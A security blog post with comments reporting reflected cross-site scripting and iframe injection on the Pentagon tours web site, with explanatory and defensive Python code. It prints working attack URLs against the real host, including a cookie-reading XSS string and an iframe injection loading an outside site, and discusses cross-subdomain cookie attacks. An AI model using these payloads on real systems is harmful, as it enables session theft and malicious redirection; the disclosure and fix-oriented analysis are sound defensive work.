Pentagon Web Site Vulnerabilities Identified


On December 6th a Romanian hacker re-identified previously discovered input validation flaws in URL parameter handling on the tour images section of the official web site of the Pentagon, the headquarters of the U.S. Department of Defense. The hacker, who goes by Ne0h, has posted images demonstrating the vulnerabilities, which are still active at the time of this blog post, on his blog.

The vulnerabilities themselves are caused by weak validation of the name/value pairs the photo album application on the Pentagon web site receives in the query string, which are then reflected into the page without output encoding. The normal page, seen here, loads pictures of past tours of the Pentagon. The entire web site is largely an online brochure for the Pentagon, and does not appear to host sensitive data or allow users to make sensitive requests, which makes the risk profile of the site low. Ne0h actually rediscovered vulnerabilities first identified back in April by XaDoS and posted on the XSSed project.

Cross Site Scripting

The attack string that follows shows the inclusion of JavaScript that is reflected back once the tours page is returned to the browser. The special characters in the script are URL encoded. The script calls the alert function, which pops up a dialog. The inclusion of document.cookie causes every cookie the site has set in the user's browser that script is allowed to read (cookies flagged HttpOnly are excluded) to appear in the alert box. This attack is an example of a non-persistent, or reflected, cross site scripting vulnerability.

XSS String

http://pentagon.afis.osd.mil/tours?action=viewLargePhoto&title=1%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert%28document.cookie%29%3B%3C/ScRiPt%3E

XSS String, XaDos example:

http://pentagon.afis.osd.mil/tours?action=viewLargePhoto&title=group-SgtMaj.jpg%22%3E%3E!-^^%3E%3Cscript%3Ealert(%27XaDoS%27)%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS document.cookie request


The code is reflected back, unencoded, inside the src attribute of the gallery's img tag in the returned HTML:

    <div id="content_1column">
        <div id="content_main">
            <h2>Tours</h2>
            <h3>Photo Gallery</h3>
                <div id="galleryPhotoLg">

                    <img src="images/largePhotos/1>"><ScRiPt 

>alert(document.cookie);</ScRiPt>" width="650" height="480" alt="Image Gallery"  />
               </div> 

The Pentagon web site sets a JSESSIONID, the session cookie format used by Java web applications, but the site does not appear to maintain any user session, so it is likely a tracking cookie or unused. Even if cookie theft (of a valuable cookie) is out, the vulnerability still allows site redirects and related JavaScript based manipulations in the context of the Pentagon page. An example for further exploration would be some manner of cross subdomain cookie attack, since afis.osd.mil (AFIS is the American Forces Information Service) hosts a number of Department of Defense web properties, some of which may maintain user sessions or host more sensitive data than the brochureware site the Pentagon is hosting. A cookie scoped to the parent domain afis.osd.mil is presented to, and readable by script on, pentagon.afis.osd.mil, and script there can in turn set a cookie for the parent domain that sibling hosts will accept.
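As an added illustration of the cross-subdomain point (not code from this post or from any DoD system), Python's http.cookiejar models the browser's cookie scoping rules, so it can show which cookies a client carries between hosts under afis.osd.mil. The sibling host name other.afis.osd.mil and all cookie names and values are constructed; the only real host is pentagon.afis.osd.mil.

```python
# Added illustration, not the post's or any DoD system's code: which cookies a
# browser-like client sends between hosts under afis.osd.mil. The sibling host
# and every cookie value below are constructed for the example.
import http.cookiejar
import urllib.request
from email.message import Message


class _Response:
    """Minimal stand-in for an HTTP response; CookieJar only calls .info()."""

    def __init__(self, set_cookie_values):
        self._headers = Message()
        for value in set_cookie_values:
            self._headers["Set-Cookie"] = value  # Message appends, so several are kept

    def info(self):
        return self._headers


def cookie_header_sent(set_by_url, set_cookie_values, target_url):
    """Store cookies as if a response from set_by_url carried them, then return
    the Cookie header (or None) the client would attach to a request for target_url."""
    jar = http.cookiejar.CookieJar()  # DefaultCookiePolicy: browser-style domain matching
    jar.extract_cookies(_Response(set_cookie_values), urllib.request.Request(set_by_url))
    request = urllib.request.Request(target_url)
    jar.add_cookie_header(request)
    return request.get_header("Cookie")


PENTAGON = "http://pentagon.afis.osd.mil/tours"
SIBLING = "http://other.afis.osd.mil/"  # hypothetical sibling property under afis.osd.mil

# Host-only cookie, the shape a JSESSIONID normally has (no Domain attribute).
HOST_ONLY = ["JSESSIONID=constructed0123; Path=/"]
# Cookie scoped to the parent domain: any host under it can set it and will receive it.
PARENT_SCOPED = ["session=constructed4567; Domain=afis.osd.mil; Path=/"]


def scoping_matrix():
    """Four cases that separate host-only cookies from parent-scoped ones."""
    return {
        # 1. The Pentagon host's own host-only cookie never reaches a sibling host...
        "host_only_to_sibling": cookie_header_sent(PENTAGON, HOST_ONLY, SIBLING),
        # 2. ...but is sent back to the host that set it.
        "host_only_to_self": cookie_header_sent(PENTAGON, HOST_ONLY, PENTAGON),
        # 3. A sibling's parent-scoped cookie IS sent to pentagon.afis.osd.mil, where
        #    the reflected XSS can read it through document.cookie unless it is HttpOnly.
        "sibling_parent_scoped_to_pentagon": cookie_header_sent(SIBLING, PARENT_SCOPED, PENTAGON),
        # 4. Script on the Pentagon host can set a parent-scoped cookie that the sibling
        #    presents on its next request (cookie tossing / session fixation material).
        "pentagon_parent_scoped_to_sibling": cookie_header_sent(PENTAGON, PARENT_SCOPED, SIBLING),
    }


if __name__ == "__main__":
    for case, header in scoping_matrix().items():
        print(f"{case:36} -> {header}")
```

The cookie jar models only the domain and path rules, not HttpOnly; case 3 is what makes a brochureware subdomain worth fixing, and it only pays off for an attacker when the sibling's cookie is not flagged HttpOnly, so checking that flag on the other afis.osd.mil properties is the cheap first step.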

iFrame Injection

The second proof of concept demonstrates an iFrame injection vulnerability. An iFrame is an HTML element that embeds a separate document, loaded from its own URL, inside the original page. In this example, an attacker can load content from outside the Pentagon web site (malicious software and so forth) and serve it to the user as part of the Pentagon web site, using nothing more than a crafted URL.

iFrame Inclusion String

http://pentagon.afis.osd.mil/tours?action=viewLargePhoto&title=1%22%3E%3Ciframe%20src=http://ne0h.baywords.com%3E%3C/iframe%3E

iFrame loads another web site (Ne0h's blog in this case).
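Both proofs of concept come down to the same defect: the title parameter is dropped into the src attribute of the gallery's img tag with neither validation nor output encoding. The following is an added example, not the Pentagon application's code, that models that handler in Python against the two attack URLs quoted above and puts the fixes beside it; the gallery markup is reduced to the one img tag and the HTTP status codes are assumed.

```python
# Added example, not the Pentagon application's code: a model of the gallery
# handler as the returned HTML on this page shows it behaving, next to the
# minimum fix (output encoding) and the hardened version (allowlist + encoding).
import html
import re
from urllib.parse import parse_qs, urlsplit

# The two attack URLs quoted in the post.
XSS_URL = (
    "http://pentagon.afis.osd.mil/tours?action=viewLargePhoto&title="
    "1%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert%28document.cookie%29%3B%3C/ScRiPt%3E"
)
IFRAME_URL = (
    "http://pentagon.afis.osd.mil/tours?action=viewLargePhoto&title="
    "1%22%3E%3Ciframe%20src=http://ne0h.baywords.com%3E%3C/iframe%3E"
)

# The gallery markup reduced to the one tag the parameter lands in.
IMG_TEMPLATE = '<img src="images/largePhotos/{}" width="650" height="480" alt="Image Gallery" />'


def title_param(url):
    """URL-decode the title parameter, as a servlet's getParameter() would."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("title", [""])[0]


def render_vulnerable(title):
    """What the Pentagon page appears to do: the raw value goes into the src attribute."""
    return 200, IMG_TEMPLATE.format(title)


def render_encoded(title):
    """Minimum fix: HTML-encode on output. html.escape(quote=True) turns the quote
    that would close the src attribute into &quot; and < into &lt;, so the payload
    stays inside the attribute value as inert text."""
    return 200, IMG_TEMPLATE.format(html.escape(title, quote=True))


# A photo name should look like a file name; anything else is rejected outright
# (assumed policy for this example, not the site's own rule).
_PHOTO_NAME = re.compile(r"[A-Za-z0-9_-]+\.(?:jpg|jpeg|png|gif)", re.IGNORECASE)


def render_hardened(title):
    """Defense in depth: allowlist the parameter, then still encode on output."""
    if not _PHOTO_NAME.fullmatch(title):
        return 400, "Bad Request: invalid photo name"
    return 200, IMG_TEMPLATE.format(html.escape(title, quote=True))


def contains_tag(markup, tag_name):
    """True if the markup contains an opening tag of that name, case-insensitively.
    Whitespace and newlines after '<' and after the name are tolerated, which is
    exactly what the %0A%0D in the XSS string relies on."""
    pattern = r"<\s*" + re.escape(tag_name) + r"\b"
    return re.search(pattern, markup, re.IGNORECASE) is not None


if __name__ == "__main__":
    for name, url in (("XSS", XSS_URL), ("iframe", IFRAME_URL)):
        title = title_param(url)
        for label, renderer in (("vulnerable", render_vulnerable),
                                ("encoded", render_encoded),
                                ("hardened", render_hardened)):
            status, body = renderer(title)
            print(f"{name:6} {label:10} HTTP {status}: {body!r}")
```

Output encoding alone is enough to close both reflections here, because the injection point is a quoted attribute value; the allowlist is what a file-name parameter should have had in the first place, and it also stops the XaDoS variant, whose title is a real photo name with markup appended.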


Ne0h

Global Hell - We are your armageddon.

It is an interesting handle for a hacker or cracker, as it's already taken by a Canadian hacker who was a member of gLobalHell, a group responsible for a number of well known defacements and break-ins, including the systems of the White House, U.S. Army, and the U.S. Postal Service. I guess we could call his handle an homage.

This Ne0h has successfully demonstrated vulnerabilities in other web sites, including SQL injection on two MTV properties, MTV Philippines and MTV India, using the Pangolin SQL injection testing tool, and XSS (cross site scripting) vulnerabilities on TinaTurnerlive.com and Logitech.com. He has also successfully demonstrated vulnerabilities in the web site of the Romanian police.

Baywords, The Choice of Romanian Hackers?

We are now noticing a couple of these folks using Baywords, a blogging platform known for this raison d'être:

Over a year ago, a friend of ours got his blog closed by WordPress for violation of TOS. Essentially he got blocked because he linked to material that could lead to maybe a download of something that you might not have paid for. We became very upset and decided to open Baywords!

The authors whose blogs we’re linking to like Baywords for this reason:

Baywords is now back again, and we’re not taking any details on the users. As long as it’s legal to write, we won’t close down your blog. We will not give out any information, IPs or anything else — that data is deleted when no longer needed.

No condemnation; we've just noticed Baywords showing up more often in these situations. If it were not Baywords, it would just be somewhere else.

Finally

At the time of writing, these vulnerabilities are still active, which makes this nearly nine months of exposure (credit Mike Bailey for pointing this out). If not patched, the Pentagon web site may be used as part of other web based attacks, via redirection using URLs sent to a user that appear to be for the Pentagon web site. This type of XSS vulnerability, a reflected XSS, is fairly common in web applications and does not have as large an impact as other input validation problems. A high profile site such as that of the Pentagon should close it out though. The Pentagon and other DOD entities have a reputation interest in appearing to be highly competent at securing their infrastructure. If there were no other reason to search out and correct common low hanging fruit web site vulnerabilities (there are, of course), this would be reason enough.

Update 1:

This exact vulnerability continues to be pointed out, this time in October. The earliest reference we identified is still the one from April on the XSSed project.


Update 2:

Mike Bailey, a security researcher with web application expertise, and I have been having a friendly give and take on Twitter about whether this example is newsworthy by itself, and following from that, whether it is depressing that XSS flaws are no longer newsworthy, whether this serves as a good example to get reasoned attention on the issue and its downstream problems, and so on.

In the midst of proving his points, the DOD has gotten some good analysis of its web sites' XSS vulnerabilities, as Mike tested a number of the other properties under afis.osd.mil as part of his blog post. So while the first problem is being fixed, here are a few others to go after:

Department of Defense's imagery website, XSS vulnerability.

Joint combat camera center web site, XSS vulnerability.

American Forces Network, XSS vulnerability.


Comments (9)


  1. [...] XSS-ed. Praetorian Prefect | Pentagon Web Site Vulnerabilities Identified __________________ "Social engineering bypasses all technologies, including [...]

  2. mda says:

    “A Romanian hacker” When I saw that, I lost all desire to keep reading. Let's be serious. Bye.

  3. Prefect says:

    MDA – I could see that. I didn’t want to say cracker, because there did not appear to be any malicious intent.

    Researcher did not appear appropriate either.

    So I settled on hacker – he who may enjoy the challenge of breaking into other computers but does no harm;

  4. [...] addressed immediately; even if you are confident about not browsing malicious sites, a known site, such as the Pentagon web site, could be used to automatically execute or redirect you to malicious code using cross-site [...]

  5. [...] to an external JavaScript, I can do most anything I can do in JavaScript,” says Kennedy, who blogged about the find yesterday. “That includes basic stuff, like crafting a URL to send to users [...]

  6. MaXe says:

    There are more XSS vulnerabilities on the DoD domain.. (They've already been notified)

  7. [...] Pentagon Web Site Vulnerabilities Identified – praetorianprefect.com A Romanian hacker has discovered security vulnerabilities on a tour images section of the official web site of the Pentagon. [...]

  8. [...] Pentagon Web Site Vulnerabilities Identified [...]